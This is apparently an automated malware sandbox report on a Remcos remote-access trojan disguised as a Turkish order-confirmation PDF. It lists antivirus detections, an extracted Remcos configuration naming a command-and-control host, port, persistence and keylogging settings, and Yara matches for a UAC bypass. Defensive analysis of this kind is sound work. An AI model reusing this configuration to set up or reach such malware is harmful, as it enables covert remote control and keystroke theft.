                    Source: 8.3.Eluiezilfw.exe.3ac0024.15.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ae2814.97.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac8560.26.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac1b54.29.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396dc40.54.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac5ee4.92.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396d700.50.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396bbdc.14.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c6a8.43.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397f8dc.46.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3982814.99.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acdc40.55.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.0.DpiScaling.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4ae4.72.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39717a0.66.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973e08.78.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3abe240.7.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960168.20.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adf8dc.46.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac7bf0.16.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396a22c.30.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3add83c.73.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3971194.72.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acc6a8.41.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966924.76.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac1b54.31.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ee4.90.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad1194.73.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad4008.91.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad28f8.35.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39728f8.35.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ae2814.99.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396413c.61.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.2.DpiScaling.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966924.77.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39794ec.80.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac803c.108.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395844c.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.22a33e8.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396413c.59.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad8008.105.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.10540000.8.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395e4d0.11.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3addbec.69.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad9a8c.88.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.2264588.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.67.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.103.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad3e08.77.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396d700.52.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.57.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.28.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac7bf0.17.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6c84.100.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6c84.102.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3aca22c.33.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac00d8.19.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac2dac.51.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acff08.24.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad3950.86.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.44.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acff08.24.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6c84.101.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6588.94.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.16.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac413c.59.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adafd8.37.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.42.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac3034.53.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6924.76.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.23.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.3168bd8.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.87.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3abdda4.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3abdda4.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964578.12.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3abe4d0.11.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.86.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3961b54.31.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac8008.22.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.2.DpiScaling.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac00d8.18.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac03a8.27.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973e08.79.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac413c.60.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39603a8.26.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.74.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3971194.73.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6c84.100.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3abe240.7.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac2dac.49.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ae4008.38.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad46cc.98.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad17a0.67.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac52c8.9.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acc008.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac0168.22.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4578.10.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad28f8.32.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac26fc.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.55.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.49.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.88.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4ae4.70.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39626fc.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad3e08.79.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4008.58.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.95.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.232a7c8.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396a22c.33.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6d08.104.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ae4008.36.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3aca22c.31.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adafd8.34.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.0.logagent.exe.10540000.0.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad8008.107.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397f8dc.45.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6d08.104.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac704c.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad9a8c.89.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397bf00.63.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac3034.53.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac03a8.25.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.19.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acbbdc.13.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad1194.71.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4ae4.70.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4348.65.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad4008.93.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.23635e8.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac704c.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4008.57.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.27.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.3ab844c.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac5ee4.90.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad17a0.67.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6588.96.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad54e0.101.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adf8dc.45.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.53.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acdc40.56.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3978008.106.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad3950.87.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac5ecc.85.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac0024.15.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac8560.28.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acc008.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad17a0.65.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39746cc.98.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad46cc.96.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.9.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.2.logagent.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac5ecc.84.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.75.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ae2814.97.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acdc40.56.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad5fb8.44.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.47.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.2.logagent.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 15.0.DpiScaling.exe.10540000.0.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac5ee4.92.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.24.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.17.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960024.15.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396803c.108.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.22ea9c8.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acd700.50.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad5fb8.42.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3addbec.68.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.3ab844c.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4348.64.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4008.57.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac704c.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac413c.60.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.222a7c8.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac5ee4.90.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6588.94.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad1194.71.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad3950.87.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4348.66.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6588.95.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.89.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ae4008.38.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.93.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad8008.107.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.7.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39794ec.82.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad3950.85.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad28f8.35.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.84.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad1194.74.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adafd8.37.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad9a8c.89.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3aca22c.33.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ae2814.99.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4008.58.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.85.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.0.DpiScaling.exe.10540000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.58.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac5ecc.86.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3982814.97.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac2d80.40.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac217c.48.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3038bd8.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4578.10.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6924.78.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adbf00.62.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6924.78.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac8560.28.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3abe4d0.11.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.64.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac3034.54.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.65.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.71.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968008.21.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad94ec.82.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "Pw`~hustlelord.ddns.net:5017:", "Assigned name": "BIG", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-MZPAVR", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

                    Exploits

                    barindex
                    Yara detected UAC Bypass using ComputerDefaults
                    Source: Yara matchFile source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3ad0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395844c.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39ac37c.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.315970483.0000000003AEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.347895283.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.315787933.0000000003968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.360606462.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
